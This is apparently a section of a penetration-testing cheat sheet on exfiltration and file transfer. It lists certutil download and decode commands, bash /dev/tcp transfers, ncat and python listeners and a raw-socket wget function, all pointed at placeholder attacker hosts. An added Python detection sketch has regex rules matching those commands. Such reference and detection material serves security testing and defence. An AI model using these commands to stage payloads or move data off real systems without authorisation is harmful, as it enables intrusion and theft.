7.2 Exfiltration

Table of Contents

File Transfer

Certutil

Download
C:\> certutil.exe -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
Base64 Decoding
C:\> certutil.exe -decode <FILE>.txt <FILE>.dll

File Encryption / Decryption

Encryption
$ openssl enc -aes-256-cbc -pbkdf2 < <FILE> > <FILE>.enc
Decryption
$ openssl enc -d -aes-256-cbc -pbkdf2 < <FILE>.enc > <FILE>

Ncat

$ ncat --ssl -lnvp <LPORT>

Python3 HTTP Server

$ python3 -m http.server <LPORT>

Python SimpleHTTPServer

$ python -m SimpleHTTPServer <LPORT>

Simple FTP Server

$ python -m pyftpdlib -p 21 --write

Transferring Files with Bash

$ nc -lnvp <LPORT> < <FILE>
$ bash -c 'cat < /dev/tcp/<LHOST>/<LPORT>' > <FILE>

wget Replacement in Bash

Paste the following function directly into the shell.

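function __wget() {
    : "${DEBUG:=0}"
    local URL=$1
    local tag="Connection: close"
    local mark=0
    local proto server path line

    if [ -z "${URL}" ]; then
        printf 'Usage: %s "URL" [e.g.: %s http://www.google.com/]\n' \
               "${FUNCNAME[0]}" "${FUNCNAME[0]}"
        return 1
    fi
    # Split "http://host[:port]/path" on "/" into scheme, host[:port] and path.
    read -r proto server path <<<"${URL//// }"
    DOC=/${path// //}
    HOST=${server//:*}
    PORT=${server//*:}
    # No ":port" in the URL: both expansions return the host, so default to 80.
    [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    [[ $DEBUG -eq 1 ]] && echo "HOST=$HOST"
    [[ $DEBUG -eq 1 ]] && echo "PORT=$PORT"
    [[ $DEBUG -eq 1 ]] && echo "DOC =$DOC"

    # Open a TCP connection on fd 3 and send a plain HTTP GET (no TLS).
    exec 3<>"/dev/tcp/${HOST}/${PORT}"
    echo -en "GET ${DOC} HTTP/1.1\r\nHost: ${HOST}\r\n${tag}\r\n\r\n" >&3
    # Skip the response headers; print everything after the blank line that
    # ends them (works even if the server does not echo "Connection: close").
    while IFS= read -r line || [[ -n "${line}" ]]; do
        if [[ $mark -eq 1 ]]; then
            printf '%s\n' "${line}"
        elif [[ -z "${line%$'\r'}" ]]; then
            mark=1
        fi
    done <&3
    exec 3>&-
}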
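
The transfer commands on this page leave recognisable process command lines. The following is an added example, not part of the original cheat sheet: a detection sketch that matches those command lines and correlates the two-step certutil download and decode per host. Rule names, hosts, addresses and file names are constructed for illustration.

```python
import re
from collections import defaultdict

# Rule names are invented for this example; patterns mirror the commands on this page.
RULES = {
    "certutil_urlcache_download": re.compile(
        r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*\bhttps?://", re.I),
    "certutil_decode": re.compile(r"\bcertutil(\.exe)?\b.*[-/]decode\b", re.I),
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "python_adhoc_server": re.compile(
        r"\bpython[\d.]*\s+-m\s+(http\.server|SimpleHTTPServer|pyftpdlib)\b"),
    # ncat with --ssl and a short-option cluster containing -l (listen)
    "ncat_tls_listener": re.compile(r"\bncat\b(?=.*--ssl\b)(?=.*\s-[a-z]*l)", re.I),
}

def classify(cmdline):
    """Return the names of every rule matching one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan(events):
    """Map host -> set of rule names seen in (host, cmdline) events."""
    hits = defaultdict(set)
    for host, cmdline in events:
        hits[host].update(classify(cmdline))
    return {host: names for host, names in hits.items() if names}

def staged_decode_hosts(hits):
    """Hosts that ran both certutil steps: a stronger signal than either alone."""
    need = {"certutil_urlcache_download", "certutil_decode"}
    return sorted(h for h, names in hits.items() if need <= names)

# Constructed sample events (hosts, addresses and file names are made up).
EVENTS = [
    ("WS01", 'certutil.exe -urlcache -split -f "http://192.0.2.10/a.txt" a.txt'),
    ("WS01", "certutil.exe -decode a.txt a.dll"),
    ("WS02", "certutil.exe -verify server.cer"),
    ("WS03", "CertUtil -decode notes.txt notes.bin"),
    ("web01", "bash -c 'cat < /dev/tcp/192.0.2.10/4444'"),
    ("web01", "python3 -m http.server 8000"),
    ("web02", "ncat --ssl -lnvp 8443"),
    ("web02", "ncat --ssl example.com 443"),
]

if __name__ == "__main__":
    found = scan(EVENTS)
    for host in sorted(found):
        print(host, sorted(found[host]))
    print("download+decode:", staged_decode_hosts(found))
```

Shell redirections such as `nc -lnvp <LPORT> < <FILE>` do not appear in process arguments, so that variant needs network or file-access telemetry instead.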
